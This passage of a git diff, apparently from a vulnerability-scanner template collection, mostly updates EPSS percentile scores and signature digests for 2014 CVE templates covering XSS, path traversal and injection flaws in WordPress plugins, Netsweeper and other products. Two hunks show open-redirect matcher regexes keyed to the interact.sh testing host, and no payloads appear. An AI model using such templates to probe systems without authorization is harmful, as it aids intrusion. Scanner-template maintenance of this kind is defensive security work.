4a0a0047304502202428f091f4370da62732353fc22e5680cc9302e1e4e70e1cbaa37a4663ed014c022100fa5260d5c61ef3c1e0f045f7c9a14ff7c64cbaedfc0c1d4f4204e5916d9ed449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202428f091f4370da62732353fc22e5680cc9302e1e4e70e1cbaa37a4663ed014c022100fa5260d5c61ef3c1e0f045f7c9a14ff7c64cbaedfc0c1d4f4204e5916d9ed449:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 35614e4b4c..ae35b61189 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2908 cwe-id: CWE-79 epss-score: 0.00594 - epss-percentile: 0.75941 + epss-percentile: 0.75917 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 40db68a0a3..f7ebc454bd 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.95825 - epss-percentile: 0.99279 + epss-percentile: 0.99281 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index b0c4eba6db..d1a392313c 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.55248 - epss-percentile: 0.97315 + epss-percentile: 0.97317 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 2c31efd913..063471ed9b 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.54379 - epss-percentile: 0.97294 + epss-percentile: 0.97297 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index b422cb7623..f899177254 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77541 + epss-percentile: 0.77533 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 44371cda95..9321558647 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo epss-score: 0.96955 - epss-percentile: 0.99659 + epss-percentile: 0.99662 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202e1fc63a7d629f82532c5a5545a08832c38fb9d77b1693adeb433f8c57e610490220130845aa3dbf2acf6c609847cd699a39651a3e1ad203ef1a681ca5d1a908b802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202e1fc63a7d629f82532c5a5545a08832c38fb9d77b1693adeb433f8c57e610490220130845aa3dbf2acf6c609847cd699a39651a3e1ad203ef1a681ca5d1a908b802:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 036faf46fd..2c952897ee 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50277 + epss-percentile: 0.50258 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220257e2b72a48ef8375c4fec71578f2fadce03a5fbb96b12bd14827af9eaea794b02202adb4c6c5803e23566889d5c71a0f6d175649da611544c30635331c5810be32d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220257e2b72a48ef8375c4fec71578f2fadce03a5fbb96b12bd14827af9eaea794b02202adb4c6c5803e23566889d5c71a0f6d175649da611544c30635331c5810be32d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 2f88c6dc05..50eeb545fb 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48607 + epss-percentile: 0.48579 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025b7d9794b6e6e1ba5f061ddccd79ed1f6b66ffd68772ab513001e0cd5cc4612022100f9437f0636b75bd715b1239e761e3a8cbc9ef4f63ac05cd55b75fb689f7b869e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022025b7d9794b6e6e1ba5f061ddccd79ed1f6b66ffd68772ab513001e0cd5cc4612022100f9437f0636b75bd715b1239e761e3a8cbc9ef4f63ac05cd55b75fb689f7b869e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 7d631f8594..71ea47783b 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50874 + epss-percentile: 0.50858 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009713627b242d37d50af28d8c3365cfc9ce842fdd204d1e140a31655b98a3f4de022100d93760ca0b03a2a16d414c78dae4e2d7dbf7deeb15b50069bba24fcc9eaee962:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009713627b242d37d50af28d8c3365cfc9ce842fdd204d1e140a31655b98a3f4de022100d93760ca0b03a2a16d414c78dae4e2d7dbf7deeb15b50069bba24fcc9eaee962:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index e8762854af..e77152cf45 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48607 + epss-percentile: 0.48579 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220171a439d33e4251537cd1030bb981539e3130c01c5a693a2939cca05c8df4fca0221009f925f76a416192c6fe593deea0b2506651d13b70b6562504edda0fe0bcf0aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220171a439d33e4251537cd1030bb981539e3130c01c5a693a2939cca05c8df4fca0221009f925f76a416192c6fe593deea0b2506651d13b70b6562504edda0fe0bcf0aa8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index a867eb7dee..49a2cdf59f 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45638 + epss-percentile: 0.45619 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eabce5da7fafbc6e0eedbfa114962165943d0225d7de6cf1d57b2b552018b172022060357063a316251e565c44f8fc2ad166acfa1e3dae910fa0e89ed9b9c6c03118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eabce5da7fafbc6e0eedbfa114962165943d0225d7de6cf1d57b2b552018b172022060357063a316251e565c44f8fc2ad166acfa1e3dae910fa0e89ed9b9c6c03118:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 377f5ade07..4ce7d0b07e 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48607 + epss-percentile: 0.48579 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200be90839d403392a01561f42c1bc9eb28240d52421856b79a0e3c9b9971a6407022100a60903384fceb17ea675d25ecf53aa78503e932d6694c7ae323d9440e884a63e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200be90839d403392a01561f42c1bc9eb28240d52421856b79a0e3c9b9971a6407022100a60903384fceb17ea675d25ecf53aa78503e932d6694c7ae323d9440e884a63e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index cc7b6b9e32..f2ff542412 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48607 + epss-percentile: 0.48579 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f7c490f26b3f2a8ead40f813ff5da60cdc904a9d139adb70198d22aca74ef0502204a6f36e443a91d069600779064f8c751237b599fc01935ff4b802b68108292c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009f7c490f26b3f2a8ead40f813ff5da60cdc904a9d139adb70198d22aca74ef0502204a6f36e443a91d069600779064f8c751237b599fc01935ff4b802b68108292c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index f98a937f8d..0779113ade 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40579 + epss-percentile: 0.40523 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcb855906364708aa1f7573593655d314b0beb61fb0432f7d3c3caf609547521022100c24daeec99525a46369f06afbef807e7501d2e5b9d4c7a2785715b079ecad68d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bcb855906364708aa1f7573593655d314b0beb61fb0432f7d3c3caf609547521022100c24daeec99525a46369f06afbef807e7501d2e5b9d4c7a2785715b079ecad68d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index d2afce1381..f5d4898a48 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48607 + epss-percentile: 0.48579 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -57,4 +57,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e4ec4bc9cef4becb6d855ca5796f818420c4d9217ac233883c5371e3749c5ef202202acba25ddb0b07a5412f575e58e12bb2fbcb10c845a07b88178f2955169a3b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e4ec4bc9cef4becb6d855ca5796f818420c4d9217ac233883c5371e3749c5ef202202acba25ddb0b07a5412f575e58e12bb2fbcb10c845a07b88178f2955169a3b8a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 1f3000ddf7..1e53c6718c 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4942 cwe-id: CWE-200 epss-score: 0.01024 - epss-percentile: 0.82123 + epss-percentile: 0.82108 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index a8691298e2..ef060b826c 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.0445 - epss-percentile: 0.91521 + epss-percentile: 0.91507 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 3e4b486fd1..c6af88b460 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 0.01386 - epss-percentile: 0.84887 + epss-percentile: 0.84856 cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d72e92433820ddd1cda3967b2bc9ccf5a1bcf3460ef27fd1ddc5967046b084b9022100fc286caa03a785daf7a8813a87dcab18bee0962ef3b16a58920b2cc584665b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d72e92433820ddd1cda3967b2bc9ccf5a1bcf3460ef27fd1ddc5967046b084b9022100fc286caa03a785daf7a8813a87dcab18bee0962ef3b16a58920b2cc584665b3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 4205abf6d6..29b3e25c6e 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94048 + epss-percentile: 0.94044 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 8e662394ad..36aada0cd7 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -20,7 +20,7 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - epss-percentile: 0.99835 + epss-percentile: 0.99836 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 017fb87ffd..87954fd53f 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94058 + epss-percentile: 0.94056 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index a5cb7dcebd..bc5783f48b 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8676 cwe-id: CWE-22 epss-score: 0.00195 - epss-percentile: 0.57311 + epss-percentile: 0.57299 cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220553353d3deefdd222c127388a4fc59421e655341c189edb237749c06ee72114d0221008075118818a3d9f8105a8ae1fde288fc438406f948aed3c5f4824fad3dff1ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220553353d3deefdd222c127388a4fc59421e655341c189edb237749c06ee72114d0221008075118818a3d9f8105a8ae1fde288fc438406f948aed3c5f4824fad3dff1ac8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 82020e452e..1f188e6d8b 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.00808 - epss-percentile: 0.79792 + epss-percentile: 0.79781 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 9672123147..7d6baffd0e 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.95638 + epss-percentile: 0.95635 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 10f7b9e873..b5bc25517b 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.32637 - epss-percentile: 0.96583 + epss-percentile: 0.96584 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 3dbdca3e14..037f16f80a 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9119 cwe-id: CWE-22 epss-score: 0.1414 - epss-percentile: 0.95142 + epss-percentile: 0.9514 cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 34c6327c35..ccca9720e6 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9180 cwe-id: CWE-601 epss-score: 0.00248 - epss-percentile: 0.62632 + epss-percentile: 0.62625 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402204b2576d82fd8fb70b93939a53d625ba6a267bd4ccaa75a4056ef9dd3464ea4730220577bd881ece86adce6c7819152f6f38c8c1e7666b10aade6c9d6ca2f519cf0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204b2576d82fd8fb70b93939a53d625ba6a267bd4ccaa75a4056ef9dd3464ea4730220577bd881ece86adce6c7819152f6f38c8c1e7666b10aade6c9d6ca2f519cf0aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 660ffb3ea8..292c428c34 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.00287 - epss-percentile: 0.65403 + epss-percentile: 0.65405 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100964bca9bf0c1c9356704d7fe21fe2abd3b97a06a42c642991b9e20fbd2e3dc41022100e7f46e4cdd388ed4e68746fa9f06975c00a74515e843ed28bc94ba247c157b6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100964bca9bf0c1c9356704d7fe21fe2abd3b97a06a42c642991b9e20fbd2e3dc41022100e7f46e4cdd388ed4e68746fa9f06975c00a74515e843ed28bc94ba247c157b6f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 11263a2743..dd41627e69 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41495 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098dd42775b45dcae95621cb8be2f2dcf519441e8505ea375e4c2d284d37a3396022050b2fa3dd3c295efdc5de71ec84ce6d662c3ef520208b8a25603ecce4c21cf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210098dd42775b45dcae95621cb8be2f2dcf519441e8505ea375e4c2d284d37a3396022050b2fa3dd3c295efdc5de71ec84ce6d662c3ef520208b8a25603ecce4c21cf21:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 765d649ce8..73206f4f6b 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41495 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205df7b685d556d37bf01376cfb535b048c7cd551ec0949667a505a817ca8f36fb0220248b59df04fab6fc1842385fbc34855d79682eb37fbdceb3d4ef82fc00325431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205df7b685d556d37bf01376cfb535b048c7cd551ec0949667a505a817ca8f36fb0220248b59df04fab6fc1842385fbc34855d79682eb37fbdceb3d4ef82fc00325431:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 0355d06d70..c0f37c0250 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41495 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202133a8f56ad7673e63ea724014ceb3bc279b46e61142d1dd27c99c3680b69d770220201e1c88d7ab81aab267f153864cc27807e483ac729e010753562ff44dd6123c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202133a8f56ad7673e63ea724014ceb3bc279b46e61142d1dd27c99c3680b69d770220201e1c88d7ab81aab267f153864cc27807e483ac729e010753562ff44dd6123c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index bcf9ea4c6c..df488ee369 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00153 - epss-percentile: 0.51534 + epss-percentile: 0.51516 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009df06a758e9839be5c1fc96791d04a924438625a8800ab81681b16b00c829ece022100c7d42392d89a5591a71e2872318bbf28318f29bce5c60e10840edee86bec4151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009df06a758e9839be5c1fc96791d04a924438625a8800ab81681b16b00c829ece022100c7d42392d89a5591a71e2872318bbf28318f29bce5c60e10840edee86bec4151:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 4d67332896..66b66d958c 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85108 + epss-percentile: 0.85097 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 044c9dc73d..f9bee95252 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41495 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022028b16ea0a4c73f748e260606a504be1ddbd2f80fa2466ca8c80ce56d269d585502210085bdfda06e2a0c7f87005b9749f58fe3f322bb7e1a071dbd611378cb84a19768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022028b16ea0a4c73f748e260606a504be1ddbd2f80fa2466ca8c80ce56d269d585502210085bdfda06e2a0c7f87005b9749f58fe3f322bb7e1a071dbd611378cb84a19768:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index cf2ef2438c..fb07a011a5 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43887 + epss-percentile: 0.43874 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100ff879b8dd1bf18f7f1409597d8a61c8fe72387bae8ff49b56bb102ec046eb816022015dc7c3844f45df14e256658a43644d1f8fa9f5f84da7ee92704104ce219ebcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ff879b8dd1bf18f7f1409597d8a61c8fe72387bae8ff49b56bb102ec046eb816022015dc7c3844f45df14e256658a43644d1f8fa9f5f84da7ee92704104ce219ebcc:922c64590222798bb761d5b6d8e72950 diff --git 